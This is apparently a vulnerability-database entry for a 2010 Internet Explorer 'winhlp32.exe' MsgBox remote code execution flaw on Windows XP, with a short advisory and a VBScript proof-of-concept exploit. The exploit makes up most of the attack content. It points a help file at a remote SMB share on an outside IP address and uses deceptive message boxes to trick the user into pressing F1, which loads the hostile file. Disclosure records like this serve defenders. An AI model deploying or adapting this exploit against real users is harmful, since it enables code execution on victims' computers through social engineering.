Lucene search
K

Internet Explorer 'winhlp32.exe' 'MsgBox()' Code Execution Vulnerability

🗓️ 02 Mar 2010 00:00:00Reported by Maurycy ProdeusType 
zdt
 zdt
🔗 0day.today👁 16 Views

Internet Explorer remote code execution via 'winhlp32.exe' MsgBox promp

Code
===============================================================================
Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability
===============================================================================

Microsoft Internet Explorer is prone to a remote code execution vulnerability.
 
Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer.
 
Note attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when the attacker's message box prompts them to do so.
 
Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP platform.
 
<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
  
//For i=1 to 2500
//  big = big & "\..\"
//Next
  
  
MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>



#  0day.today [2018-04-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation